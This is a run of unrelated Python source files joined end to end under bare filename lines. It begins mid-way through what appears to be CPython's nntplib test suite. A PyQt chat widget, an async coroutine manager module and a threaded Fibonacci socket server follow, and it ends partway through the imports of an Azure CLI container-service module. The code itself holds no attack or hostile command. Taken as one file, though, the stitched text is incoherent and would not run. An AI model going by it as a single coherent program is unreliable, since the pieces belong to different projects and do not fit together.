NEWSGROUPS OVERVIEW.FMT OVER POST {}READER .""" if self._switched: self.push_lit(fmt.format('')) else: self.push_lit(fmt.format('MODE-')) def handle_MODE(self, what): assert not self._switched and what == 'reader' self._switched = True self.push_lit('200 Posting allowed') class NNTPv1v2TestsMixin: def setUp(self): super().setUp() def test_welcome(self): self.assertEqual(self.server.welcome, self.handler.welcome) def test_authinfo(self): if self.nntp_version == 2: self.assertIn('AUTHINFO', self.server._caps) self.server.login('testuser', 'testpw') # if AUTHINFO is gone from _caps we also know that getcapabilities() # has been called after login as it should self.assertNotIn('AUTHINFO', self.server._caps) def test_date(self): resp, date = self.server.date() self.assertEqual(resp, "111 20100914001155") self.assertEqual(date, datetime.datetime(2010, 9, 14, 0, 11, 55)) def test_quit(self): self.assertFalse(self.sio.closed) resp = self.server.quit() self.assertEqual(resp, "205 Bye!") self.assertTrue(self.sio.closed) def test_help(self): resp, help = self.server.help() self.assertEqual(resp, "100 Legal commands") self.assertEqual(help, [ ' authinfo user Name|pass Password|generic <prog> <args>', ' date', ' help', 'Report problems to <root@example.org>', ]) def test_list(self): resp, groups = self.server.list() self.assertEqual(len(groups), 6) g = groups[1] self.assertEqual(g, GroupInfo("comp.lang.python.announce", "0000001153", "0000000993", "m")) resp, groups = self.server.list("*distutils*") self.assertEqual(len(groups), 2) g = groups[0] self.assertEqual(g, GroupInfo("gmane.comp.python.distutils.devel", "0000014104", "0000000001", "m")) def test_stat(self): resp, art_num, message_id = self.server.stat(3000234) self.assertEqual(resp, "223 3000234 <45223423@example.com>") self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") resp, art_num, message_id = self.server.stat("<45223423@example.com>") self.assertEqual(resp, "223 0 <45223423@example.com>") self.assertEqual(art_num, 0) self.assertEqual(message_id, "<45223423@example.com>") with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.stat("<non.existent.id>") self.assertEqual(cm.exception.response, "430 No Such Article Found") with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.stat() self.assertEqual(cm.exception.response, "412 No newsgroup selected") def test_next(self): resp, art_num, message_id = self.server.next() self.assertEqual(resp, "223 3000237 <668929@example.org> retrieved") self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<668929@example.org>") def test_last(self): resp, art_num, message_id = self.server.last() self.assertEqual(resp, "223 3000234 <45223423@example.com> retrieved") self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") def test_description(self): desc = self.server.description("comp.lang.python") self.assertEqual(desc, "The Python computer language.") desc = self.server.description("comp.lang.pythonx") self.assertEqual(desc, "") def test_descriptions(self): resp, groups = self.server.descriptions("comp.lang.python") self.assertEqual(resp, '215 Descriptions in form "group description".') self.assertEqual(groups, { "comp.lang.python": "The Python computer language.", }) resp, groups = self.server.descriptions("comp.lang.python*") self.assertEqual(groups, { "comp.lang.python": "The Python computer language.", "comp.lang.python.announce": "Announcements about the Python language. (Moderated)", }) resp, groups = self.server.descriptions("comp.lang.pythonx") self.assertEqual(groups, {}) def test_group(self): resp, count, first, last, group = self.server.group("fr.comp.lang.python") self.assertTrue(resp.startswith("211 "), resp) self.assertEqual(first, 761) self.assertEqual(last, 1265) self.assertEqual(count, 486) self.assertEqual(group, "fr.comp.lang.python") with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.group("comp.lang.python.devel") exc = cm.exception self.assertTrue(exc.response.startswith("411 No such group"), exc.response) def test_newnews(self): # NEWNEWS comp.lang.python [20]100913 082004 dt = datetime.datetime(2010, 9, 13, 8, 20, 4) resp, ids = self.server.newnews("comp.lang.python", dt) expected = ( "230 list of newsarticles (NNTP v{0}) " "created after Mon Sep 13 08:20:04 2010 follows" ).format(self.nntp_version) self.assertEqual(resp, expected) self.assertEqual(ids, [ "<a4929a40-6328-491a-aaaf-cb79ed7309a2@q2g2000vbk.googlegroups.com>", "<f30c0419-f549-4218-848f-d7d0131da931@y3g2000vbm.googlegroups.com>", ]) # NEWNEWS fr.comp.lang.python [20]100913 082004 dt = datetime.datetime(2010, 9, 13, 8, 20, 4) resp, ids = self.server.newnews("fr.comp.lang.python", dt) self.assertEqual(resp, "230 An empty list of newsarticles follows") self.assertEqual(ids, []) def _check_article_body(self, lines): self.assertEqual(len(lines), 4) self.assertEqual(lines[-1].decode('utf-8'), "-- Signed by André.") self.assertEqual(lines[-2], b"") self.assertEqual(lines[-3], b".Here is a dot-starting line.") self.assertEqual(lines[-4], b"This is just a test article.") def _check_article_head(self, lines): self.assertEqual(len(lines), 4) self.assertEqual(lines[0], b'From: "Demo User" <nobody@example.net>') self.assertEqual(lines[3], b"Message-ID: <i.am.an.article.you.will.want@example.com>") def _check_article_data(self, lines): self.assertEqual(len(lines), 9) self._check_article_head(lines[:4]) self._check_article_body(lines[-4:]) self.assertEqual(lines[4], b"") def test_article(self): # ARTICLE resp, info = self.server.article() self.assertEqual(resp, "220 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_data(lines) # ARTICLE num resp, info = self.server.article(3000234) self.assertEqual(resp, "220 3000234 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_data(lines) # ARTICLE id resp, info = self.server.article("<45223423@example.com>") self.assertEqual(resp, "220 0 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 0) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_data(lines) # Non-existent id with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.article("<non-existent@example.com>") self.assertEqual(cm.exception.response, "430 No Such Article Found") def test_article_file(self): # With a "file" argument f = io.BytesIO() resp, info = self.server.article(file=f) self.assertEqual(resp, "220 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self.assertEqual(lines, []) data = f.getvalue() self.assertTrue(data.startswith( b'From: "Demo User" <nobody@example.net>\r\n' b'Subject: I am just a test article\r\n' ), ascii(data)) self.assertTrue(data.endswith( b'This is just a test article.\r\n' b'.Here is a dot-starting line.\r\n' b'\r\n' b'-- Signed by Andr\xc3\xa9.\r\n' ), ascii(data)) def test_head(self): # HEAD resp, info = self.server.head() self.assertEqual(resp, "221 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_head(lines) # HEAD num resp, info = self.server.head(3000234) self.assertEqual(resp, "221 3000234 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_head(lines) # HEAD id resp, info = self.server.head("<45223423@example.com>") self.assertEqual(resp, "221 0 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 0) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_head(lines) # Non-existent id with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.head("<non-existent@example.com>") self.assertEqual(cm.exception.response, "430 No Such Article Found") def test_head_file(self): f = io.BytesIO() resp, info = self.server.head(file=f) self.assertEqual(resp, "221 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self.assertEqual(lines, []) data = f.getvalue() self.assertTrue(data.startswith( b'From: "Demo User" <nobody@example.net>\r\n' b'Subject: I am just a test article\r\n' ), ascii(data)) self.assertFalse(data.endswith( b'This is just a test article.\r\n' b'.Here is a dot-starting line.\r\n' b'\r\n' b'-- Signed by Andr\xc3\xa9.\r\n' ), ascii(data)) def test_body(self): # BODY resp, info = self.server.body() self.assertEqual(resp, "222 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_body(lines) # BODY num resp, info = self.server.body(3000234) self.assertEqual(resp, "222 3000234 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000234) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_body(lines) # BODY id resp, info = self.server.body("<45223423@example.com>") self.assertEqual(resp, "222 0 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 0) self.assertEqual(message_id, "<45223423@example.com>") self._check_article_body(lines) # Non-existent id with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.body("<non-existent@example.com>") self.assertEqual(cm.exception.response, "430 No Such Article Found") def test_body_file(self): f = io.BytesIO() resp, info = self.server.body(file=f) self.assertEqual(resp, "222 3000237 <45223423@example.com>") art_num, message_id, lines = info self.assertEqual(art_num, 3000237) self.assertEqual(message_id, "<45223423@example.com>") self.assertEqual(lines, []) data = f.getvalue() self.assertFalse(data.startswith( b'From: "Demo User" <nobody@example.net>\r\n' b'Subject: I am just a test article\r\n' ), ascii(data)) self.assertTrue(data.endswith( b'This is just a test article.\r\n' b'.Here is a dot-starting line.\r\n' b'\r\n' b'-- Signed by Andr\xc3\xa9.\r\n' ), ascii(data)) def check_over_xover_resp(self, resp, overviews): self.assertTrue(resp.startswith("224 "), resp) self.assertEqual(len(overviews), 3) art_num, over = overviews[0] self.assertEqual(art_num, 57) self.assertEqual(over, { "from": "Doug Hellmann <doug.hellmann-Re5JQEeQqe8AvxtiuMwx3w@public.gmane.org>", "subject": "Re: ANN: New Plone book with strong Python (and Zope) themes throughout", "date": "Sat, 19 Jun 2010 18:04:08 -0400", "message-id": "<4FD05F05-F98B-44DC-8111-C6009C925F0C@gmail.com>", "references": "<hvalf7$ort$1@dough.gmane.org>", ":bytes": "7103", ":lines": "16", "xref": "news.gmane.org gmane.comp.python.authors:57" }) art_num, over = overviews[1] self.assertEqual(over["xref"], None) art_num, over = overviews[2] self.assertEqual(over["subject"], "Re: Message d'erreur incompréhensible (par moi)") def test_xover(self): resp, overviews = self.server.xover(57, 59) self.check_over_xover_resp(resp, overviews) def test_over(self): # In NNTP "v1", this will fallback on XOVER resp, overviews = self.server.over((57, 59)) self.check_over_xover_resp(resp, overviews) sample_post = ( b'From: "Demo User" <nobody@example.net>\r\n' b'Subject: I am just a test article\r\n' b'Content-Type: text/plain; charset=UTF-8; format=flowed\r\n' b'Message-ID: <i.am.an.article.you.will.want@example.com>\r\n' b'\r\n' b'This is just a test article.\r\n' b'.Here is a dot-starting line.\r\n' b'\r\n' b'-- Signed by Andr\xc3\xa9.\r\n' ) def _check_posted_body(self): # Check the raw body as received by the server lines = self.handler.posted_body # One additional line for the "." terminator self.assertEqual(len(lines), 10) self.assertEqual(lines[-1], b'.\r\n') self.assertEqual(lines[-2], b'-- Signed by Andr\xc3\xa9.\r\n') self.assertEqual(lines[-3], b'\r\n') self.assertEqual(lines[-4], b'..Here is a dot-starting line.\r\n') self.assertEqual(lines[0], b'From: "Demo User" <nobody@example.net>\r\n') def _check_post_ihave_sub(self, func, *args, file_factory): # First the prepared post with CRLF endings post = self.sample_post func_args = args + (file_factory(post),) self.handler.posted_body = None resp = func(*func_args) self._check_posted_body() # Then the same post with "normal" line endings - they should be # converted by NNTP.post and NNTP.ihave. post = self.sample_post.replace(b"\r\n", b"\n") func_args = args + (file_factory(post),) self.handler.posted_body = None resp = func(*func_args) self._check_posted_body() return resp def check_post_ihave(self, func, success_resp, *args): # With a bytes object resp = self._check_post_ihave_sub(func, *args, file_factory=bytes) self.assertEqual(resp, success_resp) # With a bytearray object resp = self._check_post_ihave_sub(func, *args, file_factory=bytearray) self.assertEqual(resp, success_resp) # With a file object resp = self._check_post_ihave_sub(func, *args, file_factory=io.BytesIO) self.assertEqual(resp, success_resp) # With an iterable of terminated lines def iterlines(b): return iter(b.splitlines(keepends=True)) resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines) self.assertEqual(resp, success_resp) # With an iterable of non-terminated lines def iterlines(b): return iter(b.splitlines(keepends=False)) resp = self._check_post_ihave_sub(func, *args, file_factory=iterlines) self.assertEqual(resp, success_resp) def test_post(self): self.check_post_ihave(self.server.post, "240 Article received OK") self.handler.allow_posting = False with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.post(self.sample_post) self.assertEqual(cm.exception.response, "440 Posting not permitted") def test_ihave(self): self.check_post_ihave(self.server.ihave, "235 Article transferred OK", "<i.am.an.article.you.will.want@example.com>") with self.assertRaises(nntplib.NNTPTemporaryError) as cm: self.server.ihave("<another.message.id>", self.sample_post) self.assertEqual(cm.exception.response, "435 Article not wanted") def test_too_long_lines(self): dt = datetime.datetime(2010, 1, 1, 9, 0, 0) self.assertRaises(nntplib.NNTPDataError, self.server.newnews, "comp.lang.python", dt) class NNTPv1Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase): """Tests an NNTP v1 server (no capabilities).""" nntp_version = 1 handler_class = NNTPv1Handler def test_caps(self): caps = self.server.getcapabilities() self.assertEqual(caps, {}) self.assertEqual(self.server.nntp_version, 1) self.assertEqual(self.server.nntp_implementation, None) class NNTPv2Tests(NNTPv1v2TestsMixin, MockedNNTPTestsMixin, unittest.TestCase): """Tests an NNTP v2 server (with capabilities).""" nntp_version = 2 handler_class = NNTPv2Handler def test_caps(self): caps = self.server.getcapabilities() self.assertEqual(caps, { 'VERSION': ['2', '3'], 'IMPLEMENTATION': ['INN', '2.5.1'], 'AUTHINFO': ['USER'], 'HDR': [], 'LIST': ['ACTIVE', 'ACTIVE.TIMES', 'DISTRIB.PATS', 'HEADERS', 'NEWSGROUPS', 'OVERVIEW.FMT'], 'OVER': [], 'POST': [], 'READER': [], }) self.assertEqual(self.server.nntp_version, 3) self.assertEqual(self.server.nntp_implementation, 'INN 2.5.1') class CapsAfterLoginNNTPv2Tests(MockedNNTPTestsMixin, unittest.TestCase): """Tests a probably NNTP v2 server with capabilities only after login.""" nntp_version = 2 handler_class = CapsAfterLoginNNTPv2Handler def test_caps_only_after_login(self): self.assertEqual(self.server._caps, {}) self.server.login('testuser', 'testpw') self.assertIn('VERSION', self.server._caps) class SendReaderNNTPv2Tests(MockedNNTPWithReaderModeMixin, unittest.TestCase): """Same tests as for v2 but we tell NTTP to send MODE READER to a server that isn't in READER mode by default.""" nntp_version = 2 handler_class = ModeSwitchingNNTPv2Handler def test_we_are_in_reader_mode_after_connect(self): self.assertIn('READER', self.server._caps) class MiscTests(unittest.TestCase): def test_decode_header(self): def gives(a, b): self.assertEqual(nntplib.decode_header(a), b) gives("" , "") gives("a plain header", "a plain header") gives(" with extra spaces ", " with extra spaces ") gives("=?ISO-8859-15?Q?D=E9buter_en_Python?=", "Débuter en Python") gives("=?utf-8?q?Re=3A_=5Bsqlite=5D_probl=C3=A8me_avec_ORDER_BY_sur_des_cha?=" " =?utf-8?q?=C3=AEnes_de_caract=C3=A8res_accentu=C3=A9es?=", "Re: [sqlite] problème avec ORDER BY sur des chaînes de caractères accentuées") gives("Re: =?UTF-8?B?cHJvYmzDqG1lIGRlIG1hdHJpY2U=?=", "Re: problème de matrice") # A natively utf-8 header (found in the real world!) gives("Re: Message d'erreur incompréhensible (par moi)", "Re: Message d'erreur incompréhensible (par moi)") def test_parse_overview_fmt(self): # The minimal (default) response lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", ":bytes", ":lines"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines"]) # The minimal response using alternative names lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", "Bytes:", "Lines:"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines"]) # Variations in casing lines = ["subject:", "FROM:", "DaTe:", "message-ID:", "References:", "BYTES:", "Lines:"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines"]) # First example from RFC 3977 lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", ":bytes", ":lines", "Xref:full", "Distribution:full"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines", "xref", "distribution"]) # Second example from RFC 3977 lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", "Bytes:", "Lines:", "Xref:FULL", "Distribution:FULL"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines", "xref", "distribution"]) # A classic response from INN lines = ["Subject:", "From:", "Date:", "Message-ID:", "References:", "Bytes:", "Lines:", "Xref:full"] self.assertEqual(nntplib._parse_overview_fmt(lines), ["subject", "from", "date", "message-id", "references", ":bytes", ":lines", "xref"]) def test_parse_overview(self): fmt = nntplib._DEFAULT_OVERVIEW_FMT + ["xref"] # First example from RFC 3977 lines = [ '3000234\tI am just a test article\t"Demo User" ' '<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t' '<45223423@example.com>\t<45454@example.net>\t1234\t' '17\tXref: news.example.com misc.test:3000363', ] overview = nntplib._parse_overview(lines, fmt) (art_num, fields), = overview self.assertEqual(art_num, 3000234) self.assertEqual(fields, { 'subject': 'I am just a test article', 'from': '"Demo User" <nobody@example.com>', 'date': '6 Oct 1998 04:38:40 -0500', 'message-id': '<45223423@example.com>', 'references': '<45454@example.net>', ':bytes': '1234', ':lines': '17', 'xref': 'news.example.com misc.test:3000363', }) # Second example; here the "Xref" field is totally absent (including # the header name) and comes out as None lines = [ '3000234\tI am just a test article\t"Demo User" ' '<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t' '<45223423@example.com>\t<45454@example.net>\t1234\t' '17\t\t', ] overview = nntplib._parse_overview(lines, fmt) (art_num, fields), = overview self.assertEqual(fields['xref'], None) # Third example; the "Xref" is an empty string, while "references" # is a single space. lines = [ '3000234\tI am just a test article\t"Demo User" ' '<nobody@example.com>\t6 Oct 1998 04:38:40 -0500\t' '<45223423@example.com>\t \t1234\t' '17\tXref: \t', ] overview = nntplib._parse_overview(lines, fmt) (art_num, fields), = overview self.assertEqual(fields['references'], ' ') self.assertEqual(fields['xref'], '') def test_parse_datetime(self): def gives(a, b, *c): self.assertEqual(nntplib._parse_datetime(a, b), datetime.datetime(*c)) # Output of DATE command gives("19990623135624", None, 1999, 6, 23, 13, 56, 24) # Variations gives("19990623", "135624", 1999, 6, 23, 13, 56, 24) gives("990623", "135624", 1999, 6, 23, 13, 56, 24) gives("090623", "135624", 2009, 6, 23, 13, 56, 24) def test_unparse_datetime(self): # Test non-legacy mode # 1) with a datetime def gives(y, M, d, h, m, s, date_str, time_str): dt = datetime.datetime(y, M, d, h, m, s) self.assertEqual(nntplib._unparse_datetime(dt), (date_str, time_str)) self.assertEqual(nntplib._unparse_datetime(dt, False), (date_str, time_str)) gives(1999, 6, 23, 13, 56, 24, "19990623", "135624") gives(2000, 6, 23, 13, 56, 24, "20000623", "135624") gives(2010, 6, 5, 1, 2, 3, "20100605", "010203") # 2) with a date def gives(y, M, d, date_str, time_str): dt = datetime.date(y, M, d) self.assertEqual(nntplib._unparse_datetime(dt), (date_str, time_str)) self.assertEqual(nntplib._unparse_datetime(dt, False), (date_str, time_str)) gives(1999, 6, 23, "19990623", "000000") gives(2000, 6, 23, "20000623", "000000") gives(2010, 6, 5, "20100605", "000000") def test_unparse_datetime_legacy(self): # Test legacy mode (RFC 977) # 1) with a datetime def gives(y, M, d, h, m, s, date_str, time_str): dt = datetime.datetime(y, M, d, h, m, s) self.assertEqual(nntplib._unparse_datetime(dt, True), (date_str, time_str)) gives(1999, 6, 23, 13, 56, 24, "990623", "135624") gives(2000, 6, 23, 13, 56, 24, "000623", "135624") gives(2010, 6, 5, 1, 2, 3, "100605", "010203") # 2) with a date def gives(y, M, d, date_str, time_str): dt = datetime.date(y, M, d) self.assertEqual(nntplib._unparse_datetime(dt, True), (date_str, time_str)) gives(1999, 6, 23, "990623", "000000") gives(2000, 6, 23, "000623", "000000") gives(2010, 6, 5, "100605", "000000") @unittest.skipUnless(ssl, 'requires SSL support') def test_ssl_support(self): self.assertTrue(hasattr(nntplib, 'NNTP_SSL')) class PublicAPITests(unittest.TestCase): """Ensures that the correct values are exposed in the public API.""" def test_module_all_attribute(self): self.assertTrue(hasattr(nntplib, '__all__')) target_api = ['NNTP', 'NNTPError', 'NNTPReplyError', 'NNTPTemporaryError', 'NNTPPermanentError', 'NNTPProtocolError', 'NNTPDataError', 'decode_header'] if ssl is not None: target_api.append('NNTP_SSL') self.assertEqual(set(nntplib.__all__), set(target_api)) class MockSocketTests(unittest.TestCase): """Tests involving a mock socket object Used where the _NNTPServerIO file object is not enough.""" nntp_class = nntplib.NNTP def check_constructor_error_conditions( self, handler_class, expected_error_type, expected_error_msg, login=None, password=None): class mock_socket_module: def create_connection(address, timeout): return MockSocket() class MockSocket: def close(self): nonlocal socket_closed socket_closed = True def makefile(socket, mode): handler = handler_class() _, file = make_mock_file(handler) files.append(file) return file socket_closed = False files = [] with patch('nntplib.socket', mock_socket_module), \ self.assertRaisesRegex(expected_error_type, expected_error_msg): self.nntp_class('dummy', user=login, password=password) self.assertTrue(socket_closed) for f in files: self.assertTrue(f.closed) def test_bad_welcome(self): #Test a bad welcome message class Handler(NNTPv1Handler): welcome = 'Bad Welcome' self.check_constructor_error_conditions( Handler, nntplib.NNTPProtocolError, Handler.welcome) def test_service_temporarily_unavailable(self): #Test service temporarily unavailable class Handler(NNTPv1Handler): welcome = '400 Service temporarily unavailable' self.check_constructor_error_conditions( Handler, nntplib.NNTPTemporaryError, Handler.welcome) def test_service_permanently_unavailable(self): #Test service permanently unavailable class Handler(NNTPv1Handler): welcome = '502 Service permanently unavailable' self.check_constructor_error_conditions( Handler, nntplib.NNTPPermanentError, Handler.welcome) def test_bad_capabilities(self): #Test a bad capabilities response class Handler(NNTPv1Handler): def handle_CAPABILITIES(self): self.push_lit(capabilities_response) capabilities_response = '201 bad capability' self.check_constructor_error_conditions( Handler, nntplib.NNTPReplyError, capabilities_response) def test_login_aborted(self): #Test a bad authinfo response login = 't@e.com' password = 'python' class Handler(NNTPv1Handler): def handle_AUTHINFO(self, *args): self.push_lit(authinfo_response) authinfo_response = '503 Mechanism not recognized' self.check_constructor_error_conditions( Handler, nntplib.NNTPPermanentError, authinfo_response, login, password) class bypass_context: """Bypass encryption and actual SSL module""" def wrap_socket(sock, **args): return sock @unittest.skipUnless(ssl, 'requires SSL support') class MockSslTests(MockSocketTests): @staticmethod def nntp_class(*pos, **kw): return nntplib.NNTP_SSL(*pos, ssl_context=bypass_context, **kw) class LocalServerTests(unittest.TestCase): def setUp(self): sock = socket.socket() port = support.bind_port(sock) sock.listen() self.background = threading.Thread( target=self.run_server, args=(sock,)) self.background.start() self.addCleanup(self.background.join) self.nntp = NNTP(support.HOST, port, usenetrc=False).__enter__() self.addCleanup(self.nntp.__exit__, None, None, None) def run_server(self, sock): # Could be generalized to handle more commands in separate methods with sock: [client, _] = sock.accept() with contextlib.ExitStack() as cleanup: cleanup.enter_context(client) reader = cleanup.enter_context(client.makefile('rb')) client.sendall(b'200 Server ready\r\n') while True: cmd = reader.readline() if cmd == b'CAPABILITIES\r\n': client.sendall( b'101 Capability list:\r\n' b'VERSION 2\r\n' b'STARTTLS\r\n' b'.\r\n' ) elif cmd == b'STARTTLS\r\n': reader.close() client.sendall(b'382 Begin TLS negotiation now\r\n') context = ssl.SSLContext() context.load_cert_chain(certfile) client = context.wrap_socket( client, server_side=True) cleanup.enter_context(client) reader = cleanup.enter_context(client.makefile('rb')) elif cmd == b'QUIT\r\n': client.sendall(b'205 Bye!\r\n') break else: raise ValueError('Unexpected command {!r}'.format(cmd)) @unittest.skipUnless(ssl, 'requires SSL support') def test_starttls(self): file = self.nntp.file sock = self.nntp.sock self.nntp.starttls() # Check that the socket and internal pseudo-file really were # changed. self.assertNotEqual(file, self.nntp.file) self.assertNotEqual(sock, self.nntp.sock) # Check that the new socket really is an SSL one self.assertIsInstance(self.nntp.sock, ssl.SSLSocket) # Check that trying starttls when it's already active fails. self.assertRaises(ValueError, self.nntp.starttls) if __name__ == "__main__": unittest.main()
chatWidget.py
from PyQt5 import QtGui,QtWidgets,QtCore from ..Chat.client import ChatClient import sys,socket, threading class ChatWidget(QtWidgets.QWidget): def __init__(self,name): super().__init__() self.name=name self.client=None self.initUI() def initUI(self): self.chatMessages=QtWidgets.QListWidget() self.inputBox=QtWidgets.QTextEdit() self.inputBox.installEventFilter(self) self.scrollBar=QtWidgets.QScrollBar() self.scrollBar.setStyleSheet('background : lightgrey;') self.chatMessages.setVerticalScrollBar(self.scrollBar) self.inputBox.setFixedHeight( int( self.inputBox.fontMetrics().lineSpacing()*3+self.inputBox.document().documentMargin()*2+self.inputBox.frameWidth()*2-1 ) ) self.sendButton=QtWidgets.QPushButton('Send') self.sendButton.clicked.connect(self.onClickSend) grid=QtWidgets.QGridLayout() grid.setSpacing(3) grid.addWidget(self.chatMessages, 0, 0, 1, 3) grid.addWidget(self.inputBox, 1, 0, 1, 1) grid.addWidget(self.sendButton, 1, 2) grid.setRowStretch(0, 1) grid.setColumnStretch(0, 1) self.setLayout(grid) self.sendButton.setEnabled(False) self.inputBox.setEnabled(False) def eventFilter(self, obj, event): if event.type() == QtCore.QEvent.KeyPress and obj is self.inputBox: if event.key() == QtCore.Qt.Key_Return and self.inputBox.hasFocus(): self.onClickSend() self.inputBox.setText('') return super().eventFilter(obj, event) def intializeClient(self, addr, port, userPassword, isHost): if self.client: self.client.quit() self.client = ChatClient(addr,port, isHost) #self.client.reciveMessage.connect(self.addMessage) self.client.receiveMessageTrigger.connect(self.addMessage) threading.Thread(target= self.client.listenForIncomingMessages, daemon= True).start() self.client.sendMessage(userPassword) self.client.sendMessage('1234joined: '+self.name) self.sendButton.setEnabled(True) self.inputBox.setEnabled(True) def onClickSend(self): msg = self.inputBox.toPlainText() if not msg: return self.addMessage(self.name+': '+msg) self.client.sendMessage(self.name+': '+msg) def addMessage(self,msg): self.chatMessages.addItem(QtWidgets.QListWidgetItem(msg)) self.inputBox.setText('') def cleanUp(self): if self.client: self.client.quit()
__init__.py
import threading from async_services.core.exceptions import ManagerNotInitialized from async_services.core.manager import ServiceManager # There will be only one Service Manager at a time # The Service Manager can be Stopped at any point of time service_manager = None def run_manager(block=False): """ Starts the manager process You need not call this function before scheduling a coroutine. The scheduler will call it for you if not called before scheduling. :param block: if True this will be a blocking call the event loop will run in the calling thread. Otherwise a thread is spawned for event loop to run. :return: """ global service_manager if not service_manager: service_manager = ServiceManager() if block: service_manager.run() else: threading.Thread(target=service_manager.run).start() while not service_manager.is_initialized: pass def run_coro(coro, block=False, callback=None, timeout=None): """ :param coro: coroutine to schedule :param block: whether or not to block until the coroutine finishes :param callback: a function which at least takes two arguments 1. status : status of coroutine 2. response : value returned by the coroutine :param timeout: Seconds after which coro is cancelled if coroutine is not Completed :return: if block is True it returns a tuple <status, response> otherwise it returns a string <coruotine_id> that you can use to get the result in future or cancel it. """ if not service_manager: run_manager() return service_manager.schedule(coro, block, callback, timeout) def check_result(coro_id): """ :param coro_id: corutine_id of the coroutine :return: it returns a tuple <status, response> """ if service_manager: return service_manager.check_result(coro_id) raise ManagerNotInitialized("Async Services Manager Not Initialized.") def cancel_coro(coro_id): """ :param coro_id: corutine_id of the coroutine :return: """ if service_manager: return service_manager.cancel_coro(coro_id) raise ManagerNotInitialized("Async Services Manager Not Initialized.") def stop_manager(): """ Cancel all running coroutines. Close the thread. Stop Currently Running Manager :return: """ global service_manager if service_manager: service_manager.stop() service_manager = None return raise ManagerNotInitialized("Async Services Manager Not Initialized.")
threaded_server.py
from socket import * from t1 import fib from threading import Thread import sys print(sys.getswitchinterval()) #sys.setswitchinterval(.000005) # new 3.2 every .05 sec it switch #sys.setcheckinterval(1) old python 2.7 before Antoine Pitrou 3.2 def fib_server(address): server=socket(AF_INET,SOCK_STREAM) server.setsockopt(SOL_SOCKET,SO_REUSEADDR,1) server.bind(address) server.listen(5) while True: client,add=server.accept() print(f"connection {add}") Thread(target=fib_handler,args=(client,add)).start() def fib_handler(client,addr): while True: try: req=client.recv(100) num=int(req) result=fib(num) result=str(result).encode('ascii')+b'\n' client.send(result) except ConnectionResetError: break print(f'connection closed {addr}') fib_server(('',25000))
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from __future__ import print_function import binascii import datetime import errno import json import os import os.path import platform import random import re import ssl import stat import string import subprocess import sys import tempfile import threading import time import uuid import webbrowser from six.moves.urllib.request import urlopen # pylint: disable=import-error from six.moves.urllib.error import URLError # pylint: disable=import-error import yaml import dateutil.parser from dateutil.relativedelta import relativedelta from knack.log import get_logger from knack.util import CLIError from msrestazure.azure_exceptions import CloudError import requests from azure.cli.command_modules.acs import acs_client, proxy from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod from azure.cli.core.api import get_config_dir from azure.cli.core._profile import Profile from azure.cli.core.commands.client_factory import get_mgmt_service_client from azure.cli.core.keys import is_valid_ssh_rsa_public_key from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait from azure.cli.core.commands import LongRunningOperation from azure.graphrbac.models import (ApplicationCreateParameters, ApplicationUpdateParameters, PasswordCredential, KeyCredential, ServicePrincipalCreateParameters, GetObjectsParameters, ResourceAccess, RequiredResourceAccess) from azure.mgmt.containerservice.models import ContainerServiceLinuxProfile from azure.mgmt.containerservice.models import ContainerServiceNetworkProfile from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes from azure.mgmt.containerservice.models import ContainerServiceServicePrincipalProfile from azure.mgmt.containerservice.models import ContainerServiceSshConfiguration from azure.mgmt.containerservice.models import ContainerServiceSshPublicKey from 